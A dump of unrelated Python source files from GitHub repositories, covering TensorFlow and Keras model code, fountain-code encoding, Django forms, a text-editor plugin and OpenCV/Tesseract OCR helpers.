Patch the location of gfile\ntf.gfile = tf.io.gfile\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = \"C:\\\\Users\\\\Hussa\\\\Desktop\\\\TF2\\\\Experiment\\\\labelmap.pbtxt\"\ncategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=False)\n# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.\ndef run_inference_for_single_image(model, image):\n image = np.asarray(image)\n # The input needs to be a tensor, convert it using `tf.convert_to_tensor`.\n input_tensor = tf.convert_to_tensor(image)\n # The model expects a batch of images, so add an axis with `tf.newaxis`.\n input_tensor = input_tensor[tf.newaxis,...]\n # Run inference\n model_fn = model.signatures['serving_default']\n output_dict = model_fn(input_tensor)\n # All outputs are batches tensors.\n # Convert to numpy arrays, and take index [0] to remove the batch dimension.\n # We're only interested in the first num_detections.\n num_detections = int(output_dict.pop('num_detections'))\n output_dict = {key:value[0, :num_detections].numpy() \n for key,value in output_dict.items()}\n output_dict['num_detections'] = num_detections\n\n score = output_dict['detection_scores'][0]\n print(score)\n if score < MIN_DETECTION_SCORE:\n return \"none\" \n \n return category_index[output_dict['detection_classes'][0]]['name']\n \ndef return_faculty_id(image):\n #return the name of the faculty \n name = run_inference_for_single_image(Model.detection_model, image)\n\n #remove any numbers inside name \n name = re.sub('[123]', '', name)\n name = name.lower()\n \n return Model.faculties_ids[name]\n ","repo_name":"hussamoq/django","sub_path":"test_project/core/aiModel.py","file_name":"aiModel.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"392251093","text":"from soliton import soliton\nimport random\nfrom math import ceil, floor\nimport sys\nfrom pprint import pprint as pp\n\ndef lt_encode(source, blocksize=1024):\n prng = random.Random()\n n = len(source)\n N = int(ceil(n/blocksize))\n #print(n)\n #print(N)\n s = soliton(N, prng.randint(0, 2 ** 32 - 1))\n while 1:\n d = next(s)\n seed = prng.randint(0, 2 ** 32 - 1)\n rng = random.Random(seed)\n r = bytearray(blocksize)\n for k in rng.sample(range(N), d):\n #sys.stdout.write(\"{:d}\\t\".format(k))\n offset = k*blocksize\n j = 0\n end = min(offset + blocksize, n)\n while offset < end:\n r[j] ^= source[offset]\n offset += 1\n j += 1\n \n #sys.stdout.write(\"\\n\");\n yield {\"degree\": d, \"seed\": seed, \"data\": r}\n\ndef pop(s):\n while len(s):\n yield s.pop()\n\ndef pop_edges(s):\n while len(s.edges):\n e = s.edges.pop()\n e.edges.remove(s)\n yield e\n\nclass node_original:\n def __init__(self, parent, original, i, blocksize=1024):\n self.parent = parent\n self.known = False\n self.i = i\n self.edges = set() # Set of droplets associated with this block\n self.blocksize = blocksize\n\n offset = i*blocksize\n end = offset + blocksize if offset + blocksize <= parent.n else parent.n\n self.data = memoryview(original)[i*blocksize:(i+1)*blocksize]\n \n def pop_edges(self):\n while len(self.edges):\n e = self.edges.pop()\n e.edges.remove(self)\n yield e\n\n def process(self):\n assert(self.known)\n for d in pop_edges(self): # d is for droplet\n for j in range(self.blocksize):\n d.data[j] ^= self.data[j][0]\n if len(d.edges) == 1:\n d.process()\n\nclass node_droplet:\n def __init__(self, parent, original_nodes, N, blocksize, degree, seed, data):\n self.parent = parent\n self.seed = seed\n self.data = bytearray(data)\n self.edges = set()\n\n rng = random.Random(seed)\n\n for k in rng.sample(range(N), degree):\n #sys.stdout.write(\"{:d}\\t\".format(k));\n if not original_nodes[k].known:\n self.edges.add(original_nodes[k])\n original_nodes[k].edges.add(self)\n else:\n for j in range(blocksize):\n self.data[j] ^= original_nodes[k].data[j][0]\n\n # assert(len(self.edges) == degree) - This isn't true for recurring indices.\n\n #sys.stdout.write(\"\\n\");\n\n #for e in self.edges:\n #sys.stdout.write(\"{:d}\\t\".format(e.i))\n\n #sys.stdout.write(\"\\n\");\n\n if len(self.edges) == 1:\n self.process()\n\n def process(self):\n #print(len(self.edges))\n assert(len(self.edges) == 1)\n #print(\"Processing node {:d}...\".format(self.seed))\n e = self.edges.pop() # Reference to original\n e.edges.remove(self)\n if not e.known:\n e.data[:] = self.data\n e.known = True\n self.parent.unknown_blocks -= 1\n e.process()\n\n\nclass lt_decode:\n def __init__(self, n, blocksize=1024):\n self.N = int(ceil(n/blocksize))\n self.blocksize = blocksize\n self.n = n\n self.original = bytearray(self.N*self.blocksize)\n self.unknown_blocks = self.N\n self.original_nodes = []\n #self.droplets = []\n\n for i in range(self.N):\n self.original_nodes.append(node_original(self, self.original, i, blocksize))\n\n def catch(self, droplet):\n n = node_droplet(self, self.original_nodes, self.N, self.blocksize,\n droplet['degree'], droplet['seed'], droplet['data'])\n #self.droplets.append(node_droplet(self, self.original_nodes, self.N, self.blocksize,\n # droplet['degree'], droplet['seed'],\n # droplet['data']))\n\nif __name__ == \"__main__\":\n #from pprint import pprint as pp\n #with open('hello.bin', 'rb') as f:\n with open('testfile.bin', 'rb') as f:\n buf = f.read()\n\n fountain = lt_encode(buf)\n bucket = lt_decode(len(buf))\n\n i = 0\n while bucket.unknown_blocks > 0:\n i += 1\n bucket.catch(next(fountain))\n print(\"Caught {:d} droplets. There are {:d} unknown blocks.\".format(i, bucket.unknown_blocks),\n end='\\r')\n\n assert(bucket.original == buf)\n print(\"Decoded message of {:d} blocks using {:d} droplets ({:f}%).\".format(bucket.N, i, (i*100)/bucket.N))\n","repo_name":"alexchamberlain/socket","sub_path":"fountain/lt.py","file_name":"lt.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"9864262868","text":"import pandas as pd\ntrain_data_path=\"home-data/train.csv\"\ntest_data_path=\"home-data/test.csv\"\ntrain_data=pd.read_csv(train_data_path)\ntest_data=pd.read_csv(train_data_path)\nprint(train_data.describe())\ny_train=train_data.SalePrice\nfeatures=['LotArea','YearBuilt','1stFlrSF','2ndFlrSF','FullBath','BedroomAbvGr','TotRmsAbvGrd']\nX_train=train_data[features]\nprint(X_train.head())\nprint(X_train.describe())\nprint(y_train.describe())\n\ny_test=test_data.SalePrice\nX_test=test_data[features]\nprint(X_train.head())\nprint(X_train.describe())\nprint(y_train.describe())\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.ensemble import RandomForestRegressor\n\nforest_model=RandomForestRegressor(random_state=1)\nforest_model.fit(X_train,y_train)\npredict_y=forest_model.predict(X_test)\nmae=mean_absolute_error(y_test,predict_y)\nprint(mae)\n","repo_name":"smn57958/HousingAnalysisML","sub_path":"learnML_RandomForestTestData.py","file_name":"learnML_RandomForestTestData.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35084306761","text":"from django import forms\nfrom peserta.models import Peserta, Program, Trainer, Kelas, Pendaftaran\nfrom django.contrib.auth.forms import UserCreationForm\n\n# class TrainerUserForm(UserCreationForm):\n\n\nclass TrainerForm(forms.ModelForm):\n class Meta:\n model = Trainer\n exclude = ('user',)\n widgets = {\n 'tgl_lahir': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n }\n\n def __init__(self, *args, **kwargs):\n super(TrainerForm, self).__init__(*args, **kwargs)\n\n for visible in self.visible_fields():\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n\n\nclass FormPeserta(forms.ModelForm):\n program_query = Program.objects.all().order_by('nama_program')\n program = forms.ModelChoiceField(queryset=program_query)\n\n class Meta:\n model = Peserta\n exclude = ('user',)\n widgets = {\n 'tgl_lahir': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n }\n\n def __init__(self, *args, **kwargs):\n super(FormPeserta, self).__init__(*args, **kwargs)\n\n for visible in self.visible_fields():\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n\n\nclass ProgramForm(forms.ModelForm):\n class Meta:\n model = Program\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(ProgramForm, self).__init__(*args, **kwargs)\n\n for visible in self.visible_fields():\n if visible.name == \"name\":\n visible.field.widget\\\n .attrs['autofocus'] = 'autofocus'\n\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n\n\nclass KelasForm(forms.ModelForm):\n class Meta:\n model = Kelas\n fields = '__all__'\n widgets = {\n 'tgl_mulai': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n 'tgl_berakhir': forms.DateInput(attrs={'class':'form-control', 'type':'date'}),\n \n }\n\n def __init__(self, *args, **kwargs):\n super(KelasForm, self).__init__(*args, **kwargs)\n\n self.fields['trainer']\\\n .queryset = Trainer.objects.all()\n\n self.fields['pendaftaran']\\\n .queryset = Pendaftaran.objects.filter(is_register=True)\n\n \n for visible in self.visible_fields():\n if visible.name == \"trainer\":\n visible.field.widget\\\n .attrs['multiple'] = 'multiple'\n\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n\n\nclass TambahPendaftaranForm(forms.Form):\n \n program_query = Program.objects.all().order_by('nama_program')\n program = forms.ModelChoiceField(queryset=program_query)\n keterangan = forms.CharField(max_length=255, label='keterangan')\n\n def __init__(self, *args, **kwargs):\n super(TambahPendaftaranForm, self).__init__(*args, **kwargs)\n \n for visible in self.visible_fields():\n visible.field.widget\\\n .attrs['class'] = 'form-control input-sm'\n","repo_name":"IbadMukrom/COURSES-ITEC-APPS","sub_path":"peserta/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10214390579","text":"import keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\nimport pysnooper\nimport keras_to_savedmodel\nimport ai_platform\nimport os\n\n@pysnooper.snoop()\ndef get_data(num_classes):\n # input image dimensions\n img_width, img_height = 28, 28\n\n # the data, split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n print(x_train.shape)\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_width, img_height)\n x_test = x_test.reshape(x_test.shape[0], 1, img_width, img_height)\n input_shape = (1, img_width, img_height)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_width, img_height, 1)\n x_test = x_test.reshape(x_test.shape[0], img_width, img_height, 1)\n input_shape = (img_width, img_height, 1)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n return x_train, y_train, x_test, y_test, input_shape\n\n@pysnooper.snoop()\ndef get_model(input_shape, num_classes, x_train, y_train, x_test, y_test, filename):\n batch_size = 128\n epochs = 3\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\n model_json = model.to_json()\n\n with open(f\"{filename}.json\", \"w\") as json_file:\n json_file.write(model_json)\n model.save_weights(f'{filename}.h5')\n\n\ndef run():\n num_classes = 10\n export_path = \"trained_model\"\n deployment_uri = \"gs://antsa-demo-devfest/trained_model\"\n model_name = \"mnist\"\n model_version = \"v1\"\n project_id = \"antsa-demo-devfest\"\n filename = \"mnist_model\"\n x_train, y_train, x_test, y_test, input_shape = get_data(num_classes)\n get_model(input_shape, num_classes, x_train, y_train, x_test, y_test, filename)\n keras_to_savedmodel.convert(f'{filename}.h5', f'{filename}.json', export_path)\n ai_platform.create_model_version(model_name, model_version, project_id, deployment_uri)\n\n","repo_name":"antsarandriamihaja/demo-devfest","sub_path":"model/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26790100634","text":"import os\nfrom datetime import datetime\nfrom time import time, strftime, gmtime\nimport locale\nimport cudatext as app\nfrom cudatext import ed\nfrom cudax_lib import get_translation\n\n_ = get_translation(__file__) # i18n\n\nDEF_CONFIG = '''#Documentation about formats: http://strftime.org/\n%d/%m/%Y %H:%M:%S\n%d.%m.%Y\n%Y.%m.%d\n%d %B %Y\n%d %b %Y\n%A %d %B %Y\n%H:%M:%S\nrfc\nunix\n'''\n\nini = os.path.join(app.app_path(app.APP_DIR_SETTINGS), 'cuda_insert_time.ini')\nif not os.path.isfile(ini):\n with open(ini, 'w') as f:\n f.write(DEF_CONFIG)\n\nCOMMENT_CHAR = '#'\nDEFAULT_CHAR = '@'\n\n\ndef get_format_lines():\n with open(ini, 'r') as f:\n res = f.read().splitlines()\n res = [s.lstrip(DEFAULT_CHAR) for s in res if s and not s.startswith(COMMENT_CHAR)]\n return res\n\ndef get_default_format():\n with open(ini, 'r') as f:\n res = f.read().splitlines()\n res = [s.lstrip(DEFAULT_CHAR) for s in res if s and s.startswith(DEFAULT_CHAR)]\n if res:\n return res[0]\n\ndef do_format(s):\n if s=='rfc':\n return strftime(\"%a, %d %b %Y %H:%M:%S +0000\", gmtime())\n if s=='unix':\n return str(int(time()))\n t = datetime.now()\n return t.strftime(s)\n\n\nclass Command:\n\n def config(self):\n\n if os.path.isfile(ini):\n app.file_open(ini)\n\n def do_insert(self, s):\n\n x, y, x1, y1 = ed.get_carets()[0]\n if y1>=0:\n if (y, x)>(y1, x1):\n x, y, x1, y1 = x1, y1, x, y\n ed.set_caret(x, y)\n ed.replace(x, y, x1, y1, s)\n else:\n ed.insert(x, y, s)\n\n ed.set_caret(x+len(s), y)\n app.msg_status(_('Date/time inserted'))\n\n\n def dialog(self):\n\n self.fix_locale()\n lines = get_format_lines()\n lines = [do_format(s) for s in lines]\n\n res = app.dlg_menu(app.DMENU_LIST, lines, caption=_('Insert Time'))\n if res is None: return\n self.do_insert(lines[res])\n\n\n def ins_default(self):\n\n self.fix_locale()\n fmt = get_default_format()\n if not fmt:\n app.msg_box(_('No default time format is specified. To specify it, open config file (menu Options / Settings-plugins / Insert Time), and prefix some format with @ char.'),\n app.MB_OK or app.MB_ICONINFO)\n return\n\n self.do_insert(do_format(fmt))\n\n\n def fix_locale(self):\n\n locale.setlocale(locale.LC_ALL, '')\n","repo_name":"Alexey-T/CudaText","sub_path":"app/cudatext.app/Contents/Resources/py/cuda_insert_time/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":2124,"dataset":"github-code","pt":"31"} +{"seq_id":"36855561466","text":"from hipnuc_module import *\nimport time\nimport numpy as np\n\ng = 2**10\na_g = 9.81/g\n\ncount = 0\nif __name__ == '__main__':\n\n HI221GW_A = hipnuc_module('COM20', 115200, './config.json')\n\n t_end = time.time() + 20\n while t_end > time.time():\n count += 1\n # data = HI221GW_A.get_module_data()['euler']\n data = HI221GW_A.get_module_data()\n # data = list(data)\n # acc = np.array(data)*a_g\n\n print(data)\n\n print(count)\n HI221GW_A.close()\n exit()\n","repo_name":"Pna2791/HiPNUC-Hi229","sub_path":"Get_RAW.py","file_name":"Get_RAW.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"18540007911","text":"from PIL import Image\nfrom PIL import ImageChops\nfrom PIL import ImageMath\nfrom PIL import ImageOps\nimport numpy as np\nimport math\nimport time\n\nproblemImageG = Image.open('Problems/Basic Problems D/Basic Problem D-10/G.png')\nproblemImageH = Image.open('Problems/Basic Problems D/Basic Problem D-10/H.png')\nproblemImageC = Image.open('Problems/Basic Problems D/Basic Problem D-10/C.png')\nproblemImageF = Image.open('Problems/Basic Problems D/Basic Problem D-10/F.png')\nproblemImageA = Image.open('Problems/Basic Problems D/Basic Problem D-10/A.png')\nproblemImageE = Image.open('Problems/Basic Problems D/Basic Problem D-10/E.png')\nproblemImageB = Image.open('Problems/Basic Problems D/Basic Problem D-10/B.png')\nproblemImageD = Image.open('Problems/Basic Problems D/Basic Problem D-10/D.png')\n\nsolutionImage1 = Image.open('Problems/Basic Problems D/Basic Problem D-10/1.png')\nsolutionImage2 = Image.open('Problems/Basic Problems D/Basic Problem D-10/2.png')\nsolutionImage3 = Image.open('Problems/Basic Problems D/Basic Problem D-10/3.png')\nsolutionImage4 = Image.open('Problems/Basic Problems D/Basic Problem D-10/4.png')\nsolutionImage5 = Image.open('Problems/Basic Problems D/Basic Problem D-10/5.png')\nsolutionImage6 = Image.open('Problems/Basic Problems D/Basic Problem D-10/6.png')\nsolutionImage7 = Image.open('Problems/Basic Problems D/Basic Problem D-10/7.png')\nsolutionImage8 = Image.open('Problems/Basic Problems D/Basic Problem D-10/8.png')\n\n\ndef calc_root_mean_square_diff(img1, img2):\n hist = ImageChops.difference(img1, img2).histogram()\n return math.sqrt((sum(y*(x**2) for x, y in enumerate(hist)))/(float(img1.size[0] * img2.size[1])))\n\nprint('difference between 1 and D is ' + str(calc_root_mean_square_diff(solutionImage1, problemImageD)));\n\n\ndef calculate_dark_pixel_ratio_of_image(img):\n imgArray = np.array(img)\n whitePixelCounter = 0;\n darkPixelCounter = 0;\n overallPixelCounter = 0;\n whitePixelArray = np.array([255,255,255,255])\n for eachRow in imgArray:\n #several pix in separate rows make a column\n for eachPix in eachRow:\n if(np.array_equal(eachPix, whitePixelArray)):\n whitePixelCounter+=1\n else:\n darkPixelCounter+=1\n overallPixelCounter+=1\n return darkPixelCounter/float(overallPixelCounter)\n\ndef imageMultiply(img1, img2):\n img1 = img1.convert(\"1\")\n img2 = img2.convert(\"1\")\n solution = ImageChops.multiply(img1, img2)\n solution.convert(\"RGBA\")\n solution.show()\n\ndef imageUnion(probImg, probImg2):\n\n probImg = probImg.convert(\"1\")\n probImg2 = probImg2.convert(\"1\")\n solved = ImageChops.logical_and(probImg, probImg2)\n\n solved = solved.convert(\"RGBA\");\n\n return solved\n\n# solved = imageUnion(problemImageA, problemImageB)\n#\n# problemImageE.show()\n# problemImageH.show()\n#\n# print(calc_root_mean_square_diff(problemImageE, problemImageH))\n\n\n\n\n# imageMultiply(problemImageG, problemImageH)\n# dprRatioA = calculate_dark_pixel_ratio_of_image(problemImageA)\n# dprRatioB = calculate_dark_pixel_ratio_of_image(problemImageB)\n# dprRatioC = calculate_dark_pixel_ratio_of_image(problemImageC)\n# dprRatioD = calculate_dark_pixel_ratio_of_image(problemImageD)\n# dprRatioE = calculate_dark_pixel_ratio_of_image(problemImageE)\n# dprRatioF = calculate_dark_pixel_ratio_of_image(problemImageF)\n# dprRatioG = calculate_dark_pixel_ratio_of_image(problemImageG)\n# drpRatioH = calculate_dark_pixel_ratio_of_image(problemImageH)\n#\n# dprSubtractLastRow = abs(dprRatioG - drpRatioH)\n#\n# print('The DPR for G is ' + str(dprRatioG))\n# print('The DPR for H is ' + str(drpRatioH))\n#\n#\n# print('DPR subtraction of last row is ' + str(dprSubtractLastRow))\n#\n# dprRatio1 = calculate_dark_pixel_ratio_of_image(solutionImage1)\n# dprRatio2 = calculate_dark_pixel_ratio_of_image(solutionImage2)\n# dprRatio3 = calculate_dark_pixel_ratio_of_image(solutionImage3)\n# dprRatio4 = calculate_dark_pixel_ratio_of_image(solutionImage4)\n# dprRatio5 = calculate_dark_pixel_ratio_of_image(solutionImage5)\n# dprRatio6 = calculate_dark_pixel_ratio_of_image(solutionImage6)\n# dprRatio7 = calculate_dark_pixel_ratio_of_image(solutionImage7)\n# dprRatio8 = calculate_dark_pixel_ratio_of_image(solutionImage8)\n#\n# print('DPR ratio for solution image 1 ' + str(dprRatio1))\n# print('DPR ratio for solution image 2 ' + str(dprRatio2))\n# print('DPR ratio for solution image 3 ' + str(dprRatio3))\n# print('DPR ratio for solution image 4 ' + str(dprRatio4))\n# print('DPR ratio for solution image 5 ' + str(dprRatio5))\n# print('DPR ratio for solution image 6 ' + str(dprRatio6))\n# print('DPR ratio for solution image 7 ' + str(dprRatio7))\n# print('DPR ratio for solution image 8 ' + str(dprRatio8))\n","repo_name":"kpbarem/Python-Game-Code","sub_path":"helloooooo.py","file_name":"helloooooo.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19504647292","text":"import csv\n\n\n# Funzione che estrae le classi contenute nel tsv\n\ndef estraiLabelConosciute(filePath):\n with open(filePath) as fd:\n rd = csv.reader(fd, delimiter=\"\\t\", quotechar='\"')\n labelConosciute = []\n for row in rd:\n labelConosciute.append(row[0])\n\n labelConosciute = list(map(int, labelConosciute))\n return labelConosciute\n ","repo_name":"AAndonio/Unsupervised-Feature-Selection-NDFS","sub_path":"utility/estrattoreClassiConosciute.py","file_name":"estrattoreClassiConosciute.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"it","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"28283298292","text":"import copy\nfrom datetime import datetime, timezone\nimport re\n\nimport pytesseract\nimport pytz\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport inspect\n\nDEBUG = 0 # textual debug information\nDEBUG_IMAGES = 0 # Display images that are to be processed or being used in some form of parsing\nDEBUG_IMAGES_DEV = 0 # Display Images with visual cues to be used in development.\n# e.g. placing markers on initial image to help with coordinates and shit\nIMG_SHOT_WAIT = False\n# Destroy the image being displayed in 200 MS. to use keyboard, Use False\nfloat_regex = re.compile(r'\\-?\\d+\\.?\\d*')\n\n\ndef get_image_size(image):\n height, width, channels = image.shape\n return {'height': height, \"width\": width}\n\n\ndef read_image(image_path):\n \"\"\"\n Read an image in cv2 format\n CV2 reads image as BGR (NOT RGB)\n :param image_path: location of image\n :return:\n \"\"\"\n image = cv2.imread(image_path)\n return image\n\n\ndef color_dict(color):\n \"\"\"\n Change RGB dictionary to list of RGB\n :param color: {'r': int, 'g': int, 'b': int}\n :return: [r,g,b]\n \"\"\"\n return [color['b'], color['g'], color['r']]\n\n\ndef crop_image(top_left, bottom_right, image):\n \"\"\"\n crop and return a subsection of an image\n :param top_left:\n :param bottom_right:\n :param image:\n :return:\n \"\"\"\n\n img = image[top_left['y']:bottom_right['y'], top_left['x']:bottom_right['x']]\n if DEBUG_IMAGES:\n show_image(img, \"Cropped Image: \")\n return img\n\n\ndef convert_color(color_from, color_to, image):\n \"\"\"\n Find a color and replace it with another color\n :param color_from: {'r': int, 'g': int,'b':int}\n :param color_to: {'r': int, 'g': int,'b':int}\n :param image: Image to do replacement in. If no image specified, original image is altered .\n :return:\n \"\"\"\n\n image[np.where((image == color_dict(color_from)).all(axis=2))] = color_dict(color_to)\n return image\n\n\ndef is_consecutive(int_list):\n \"\"\"\n Sometimes, though the probability is 1/1280 for this to happen, The middle of a page can be a straight line\n where we are trying to detect the colors.\n Since @joe will ask me again anyway, if we try 3 times to search for x moving 5 pixels to the left, I believe\n the probability of hitting a straight line three times is 1/2097152000, Hope this is a satisfactory number for you.\n :param int_list: list to check for consecutive numbers in.\n :return:\n \"\"\"\n if len(int_list) < 1 or len(int_list) == 1:\n return False\n for counter in range(len(int_list) - 1):\n if int_list[counter + 1] - int_list[counter] < 3:\n return True\n return False\n\n\ndef detect_color_location(color, image, axis):\n \"\"\"\n runs through the middle of a provided image and looks for a color.\n Returns all the x / y coordinates of a color's location.\n :param color: {'r':int[0,255], 'g':int[0,255], 'b':int[0,255]}\n :param image: Image to do an x / y search in\n :param axis: [x,y] axis\n :return: [int] pixel locations\n \"\"\"\n\n # if DEBUG_IMAGES:\n # show_image(image)\n try_count = 0 # in case of three consecutive searches in which straight lines are returned, stop\n detected_pixel_location = [] # array of pixel x or y where a particular color is located\n color = color_dict(color) # color being searched for.\n image_x = image.shape[1] # x size of image [width]\n image_y = image.shape[0] # y size of image [height]\n\n if DEBUG:\n print(\"Image Size : x = {} y = {}\".format(image_x, image_y))\n image_x_middle = int(image_x / 2)\n image_y_middle = int(image_y / 2)\n if DEBUG:\n print(\"Middle Of Image: x = {} y = {}\".format(image_x_middle, image_y_middle))\n\n if axis not in ['x', 'y']:\n return None # No axis was provided\n else:\n if axis in ['x', 'X']:\n\n if DEBUG_IMAGES_DEV:\n im_temp = copy.deepcopy(image)\n cv2.line(im_temp, (0, image_y_middle), (image_x, image_y_middle), (0, 0, 0), 1)\n show_image(im_temp, \"detect_color_location__X\")\n while not detected_pixel_location and try_count < 3: # empty pixel array\n for x in range(0, image_x):\n color_at_location = image[image_y_middle, x].tolist() # get color value as list of 3 integers\n if color_at_location == color:\n if DEBUG:\n print(\"Found color at : [{}, {}] : {}\".format(x, image_y_middle, color_at_location))\n detected_pixel_location.append(x)\n # if color at current location is a match to the one searching for,\n # add the x location to list.\n\n if is_consecutive(detected_pixel_location) or len(detected_pixel_location) == 0:\n # if the current search took place and ended up on a line, do the search again\n # Reset the detected_pixel_location to empty and subtract 5 pixels from y axis to more the\n # line a bit to the right and run same logic again.\n\n if DEBUG:\n print(\"Inside debug. Pizel locations: {}\".format(detected_pixel_location))\n print(\"Consecutive\\nRe-checking \")\n detected_pixel_location = []\n try_count += 1\n image_y_middle = image_y_middle - 5\n if try_count == 3:\n if DEBUG:\n print(\"Try Count Exceeded 3.\\n Failure\")\n return None\n\n if DEBUG_IMAGES:\n im_temp = copy.deepcopy(image)\n for x in detected_pixel_location:\n cv2.circle(im_temp, (x, image_y_middle), 3, (0, 0, 0))\n show_image(im_temp, \"detect_color_location_X_LOCATIONS\")\n\n elif axis in ['y', 'Y']:\n im_temp = copy.deepcopy(image)\n if DEBUG_IMAGES_DEV:\n cv2.line(im_temp, (image_x_middle, 0), (image_x_middle, image_y), (0, 0, 0), 1)\n show_image(im_temp, \"detect_color_location__Y\")\n while not detected_pixel_location and try_count < 3:\n for y in range(0, image_y):\n color_at_location = image[y, image_x_middle].tolist()\n if color_at_location == color:\n if DEBUG:\n print(\"Found color at : [{}, {}] : {}\".format(y, image_x_middle, color_at_location))\n detected_pixel_location.append(y)\n if is_consecutive(detected_pixel_location) or len(detected_pixel_location) < 1:\n if DEBUG:\n print(\"Consecutive\\nRe-checking \")\n detected_pixel_location = []\n try_count += 1\n image_x_middle = image_x_middle - 5\n if try_count == 3:\n if DEBUG:\n print(\"Try Count Exceeded 3. \\nFailure\")\n return None\n\n if DEBUG_IMAGES:\n im_temp = copy.deepcopy(image)\n for y in detected_pixel_location:\n cv2.circle(im_temp, (image_x_middle, y), 3, (0, 0, 0))\n show_image(im_temp, \"detect_color_location_Y_LOCATIONS\")\n return detected_pixel_location\n\n\ndef create_image_for_vertical_addition(width, height=17, character='END'):\n \"\"\"\n Creates an Image with word \"END\" written in it as a delimiter for readings.\n :param width:\n :param height:\n :param character:\n :return:\n \"\"\"\n img = np.ones((height, width, 3), np.uint8) * 255\n font = cv2.FONT_HERSHEY_DUPLEX\n bottom_left_corner_of_text = (int(width / 2) - int((width / 100) * 40), int(height / 2)\n + int((height / 100) * 40))\n font_scale = .5\n font_color = (0, 0, 0)\n line_type = 1\n cv2.putText(img, character,\n bottom_left_corner_of_text,\n font,\n font_scale,\n font_color,\n line_type)\n return img\n\n\ndef create_image_for_horizontal_addition(height, width=40, character=\"END\"):\n \"\"\"\n Create a image of specified height in white back ground and plain text written on it.\n :param height: Height of image to create\n :param width:\n :param character: Text to type\n :return:\n \"\"\"\n img = np.ones((height, width, 3), np.uint8) * 255\n font = cv2.FONT_HERSHEY_DUPLEX\n bottom_left_corner_of_text = (int(width / 2) - int((width / 100) * 40), int(height / 2))\n font_scale = .5\n font_color = (0, 0, 0)\n line_type = 1\n cv2.putText(img, character,\n bottom_left_corner_of_text,\n font,\n font_scale,\n font_color,\n line_type)\n return img\n\n\ndef stitch_image(array_of_images, orientation=\"vertical\", character='END'):\n \"\"\"\n Takes in an array of image of SAME WIDTH OR SAME HEIGHT and joins them together\n using the orientation.\n :param array_of_images:\n :param orientation:\n :param character:\n :return:\n \"\"\"\n if orientation == \"vertical\":\n height, width, _ = array_of_images[0].shape\n filler = create_image_for_vertical_addition(width, character=character)\n image = array_of_images[0]\n for images in range(1, len(array_of_images)):\n image = np.concatenate((image, filler), axis=0)\n image = np.concatenate((image, array_of_images[images]), axis=0)\n if DEBUG_IMAGES:\n show_image(image)\n return image\n\n\ndef parse_text_from_image(image, scale=2, erode=True, erode_iteration=1, erode_kernel=2, psm=6):\n \"\"\"\n OCR the crap out of an image to extract all text in it.\n :param psm:\n :param erode_kernel:\n :param erode_iteration:\n :param erode:\n :param image: image to parse text from\n :param scale: size the image needs to be magnified to\n :return:\n \"\"\"\n if DEBUG:\n print(\"Parsing Image\")\n print(\"Called from Method: {}\".format(inspect.stack()[1][3]))\n img = cv2.resize(image, (0, 0), fx=scale, fy=scale)\n if erode:\n img = apply_erode_filter(img, erode_iteration, erode_kernel)\n if DEBUG_IMAGES:\n show_image(img)\n data = pytesseract.image_to_string(Image.fromarray(img), config='--psm {}'.format(psm))\n\n if DEBUG:\n print(\"Identified String: \\n{}\\n ------------ \".format(data))\n return data\n\n\ndef parse_text_from_image_simple(image, psm=6):\n \"\"\"\n Simpler OCR of an image\n 